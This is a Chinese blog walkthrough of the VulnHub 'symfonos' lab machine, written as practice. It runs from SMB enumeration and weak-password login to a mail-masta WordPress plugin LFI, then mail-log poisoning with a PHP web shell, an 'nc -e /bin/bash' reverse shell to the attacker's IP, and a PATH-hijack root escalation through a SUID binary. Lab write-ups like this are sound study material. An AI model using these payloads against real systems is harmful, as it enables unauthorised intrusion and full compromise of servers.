首页 > 其他分享 >vulnhub-symfonos

vulnhub-symfonos

时间:2023-12-28 12:55:35浏览次数:37  
标签:helios masta 文件 symfonos vulnhub mail pl

symfonos

日常练习

0x01 信息收集

老规矩,信息收集,用 nmap 扫。
image
192.168.56.3存活。因为80端口开着,浏览器打开看看。
image
页面上没有什么有价值的信息,于是尝试路径爆破。

dirsearch -u 192.168.56.3
[10:13:48] 301 -  313B  - /manual  ->  http://192.168.56.3/manual/
[10:13:48] 200 -  201B  - /manual/index.htm

扫到了个manual目录,应该是apache2的主页,到这里还是没有什么关键的信息。
image
于是想到的刚刚nmap扫出来的端口还有445端口开放,尝试登陆smb。


0x02 SMB登录

在windows上键入\\192.168.56.3,就可以看到它开放的共享文件夹。
image
有两个目录,第二个需要账户密码,先看看第一个。
image
有一个attention.txt文件。内容如下:

Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'! 

Next person I find using one of these passwords will be fired!

-Zeus

主要是说不要用epidioko\qwerty\baseball,这三个字符串当账户密码,到这里可以猜测刚刚第二个文件夹,应该是用到了这三个密码中的其中一个,账户应该就是目录名 helios。

heliros
qwerty

经过尝试也是看到了目录下的一些文件。
image
research.txt文件下没有什么有用的,todo.txt的内容如下:

1. Binge watch Dexter
2. Dance
3. Work on /h3l105

关键信息h3l105,这是网站的路径,访问看看
image


0x03 漏洞查找

这是一个WordPress搭建的博客网站(因为这里网站没搜集到什么信息),可以利用wpscan扫一下漏洞。因为网站与symfonos.local这个域名是有绑定的,所以需要去hosts文件里进行DNS绑定(具体这里就不阐述)。

wpscan --url http://symfonos.local/h3l105/

这里是借助kali用wpscan扫描,windows的环境没配置好先将就吧。
image
扫出来的结果里插件部分是有两个,mail-mastasite-editor,可以利用searchsploit来查找这两个插件的漏洞。
mail-masta
image
site-editor
image
先看看mail-masta这个插件的吧,他是存在LFI和SQL注入的,可以先试试LFI。


0x04 文件包含

将利用文件复制到当前目录下

searchsploit -m php/webapps/40290.txt

查看一下40290.txt文件(这里是直接把payload给粘贴过来了)

http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd 

尝试文件包含
image
成功了,看看能不能包含日志文件

pl=/var/log/apache2/error.log
pl=/var/log/apache2/access.log

发现都是没有内容的
image
正当没有头绪的时候突然想到一开始nmap扫到了一个25端口,于是百度后知道了可以利用邮件日志文件写入一句话木马。原理就是发送一份带有一句话木马的邮件,然后邮件日志文件就会记录下,再利用文件包含去包含邮件日志文件,就可以达到rce的效果。
邮件日志文件是在(因为用户名是helios)

pl=/var/mail/helios

image
包含成功!!


0x05 写入木马

那么要如何写入shell呢?利用telnet发送邮件telnet 192.168.56.3 25
image
然后粘贴如下文本

MAIL FROM: y2xsec
RCPT TO: helios
data
<?php system($_GET['cmd']); ?>
.
QUIT

image
ok,已经写入了,现在去网站试试能不能执行命令。

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=ls

因为页面不好看出来,这是源代码里面显示的内容。
image
发现是可以执行命令的,那么就可以尝试反弹shell。


0x06 反弹shell

在本地执行nc监听

nc -lvvp 2333

浏览器执行

symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc%20192.168.56.1%202333%20-e%20/bin/bash

image
成功反弹shell。


0x07 提升权限

可以看到当前的一个用户是heliros
image
查看一下有没有可以suid提权的命令
image
可以看到有一个可疑的可执行文件:statuscheck,执行看看
image
这应该是返回网页的一个状态情况,看看调用了什么命令
image
这里调用了curl命令,那么思路就有了:可以构造一个假的curl,然后利用statuscheck去调用假的curl,达到一个提权的效果。

cd /tmp
echo "/bin/bash" > curl
chmod 777 ./curl
export PATH=/tmp:$PATH
/opt/statuscheck

执行成功!!
image
看看/root目录下有什么
image
成功拿到flag,完结。


0x08 总结

学到很多东西,像可以往邮件日志里写入一句话木马,这个是没有想到的。

标签:helios,masta,文件,symfonos,vulnhub,mail,pl
From: https://www.cnblogs.com/y2xsec/p/17932259.html

相关文章

  • Vulnhub-EVM-WP
    Vulnhub-EVM前言靶机地址:EVM:1~VulnHub攻击机:kalilinux靶机描述:这是为初学者设计的超级友好的盒子信息收集主机发现sudonmap-sn192.168.56.0/24端口扫描sudonmap-p-192.168.56.103详细信息扫描sudonmap-p22,53,80,110,139,143,445-A192.168.56.103......
  • Vulnhub-Vulnos:2-WP
    Vulnhub-Vulnos:2前言靶机地址:VulnOS:2~VulnHub靶机下载地址:https://download.vulnhub.com/vulnos/VulnOSv2.7z攻击机:kalilinux靶机描述:信息收集主机发现nmap-sn192.168.56.0/24靶机地址为192.168.56.104端口扫描sudonmap-p-192.168.56.104详细信息扫描s......
  • vulnhub-DC-4
    vulnhub-DC-4主机发现、端口扫描:靶机ip:192.168.57.148发现80、22端口80端口目录爆破dirbhttp://192.168.57.148sudogobusterdir-uhttp://192.168.57.148--wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt都没东西根据80端口的信息收集:ngin......
  • vulnhub Me and My Girlfriend靶场
    目录1.信息收集2.漏洞挖掘3.漏洞利用4.提升权限1.信息收集扫描存活主机sudoarp-scan-l扫描主机的开放端口nmap-p-192.168.42.156扫描端口具体开放服务nmap-p22,80-A-sV192.168.42.156扫描网站指纹whatweb192.168.42.1562.漏洞挖掘访问网站F12,查看html......
  • vulnhub DC-2靶场
    1.信息收集扫描存活主机sudoarp-scan-l扫描主机开放端口nmap-p-192.168.42.155扫描主机开放端口的具体服务nmap-p80,7744-sV-A192.168.42.15580端口是网页,7744是SSH日常扫描指纹whatweb192.168.42.1552.漏洞挖掘访问网站,发现无法访问,猜测为hosts问题改......
  • vulnhub-wp Bsidesvancouver
    ......
  • vulnhub-DC-2
    DC-2kali192.168.43.149DC-2192.168.43.18nmsp-sT--min-rate10000-p-192.168.43.18nmap-T4-A-v-Pn192.168.43.18发现开放端口:80、7744访问80端口,发现是个wordpress站点FLAG1提示使用cewl获取爆破字典cewlhttp://dc-2-wdc2Pass.txt——将爬取的单词写入文......
  • vulnhub-prime-1
    vulnhubprime-1端口扫描开的端口:80、22扫描服务、操作系统、用默认脚本进行漏扫扫描80端口目录主要看.php、.txt、.html、.zipsudogobusterdir-uhttp://192.168.57.136-x.php,.txt,.zip,.html找到了:image.php、index.php、secret.txt以及一些wordpress的东西看secr......
  • vulnhub-oscp
    vuln-oscp主要是熟悉收集信息思路以及工具使用先发现主机:nmap-sn192.168.229.0/24目标ip:192.168.229.143扫描端口:nmap-sT--min-rate10000-p-192.168.229.143nmap-sU--min-rate10000-p-192.168.229.143Nmapscanreportfor192.168.229.143Hostisup(0.016......
  • vulnhub-wp Bob 1.0.1
    ......